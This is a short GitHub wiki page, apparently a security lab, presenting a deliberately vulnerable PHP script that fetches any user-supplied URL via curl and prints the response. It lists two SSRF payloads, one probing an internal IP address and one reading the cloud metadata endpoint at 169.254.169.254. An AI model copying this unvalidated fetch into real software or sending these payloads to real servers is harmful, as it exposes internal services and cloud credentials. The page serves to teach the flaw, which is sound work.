SSRF 01 - yujitounai/helloworld GitHub Wiki

SSRF

脆弱なソースコード(php)

<?php
if (isset($_GET['url'])){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $_GET['url']);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $html = curl_exec($ch);
    echo "<xmp>";
    echo $html;
    echo "</xmp>";
}
?>
<div class="box">
<form method="get" action="">Please enter image url
<input name="url" type="text">
<input type="submit">
</form>
</div>

攻撃方法

ssrf-01.php?url=http://192.168.5.1/

ssrf-01.php?url=http://169.254.169.254/latest/meta-data/hostname

⚠️ GitHub.com Fallback ⚠️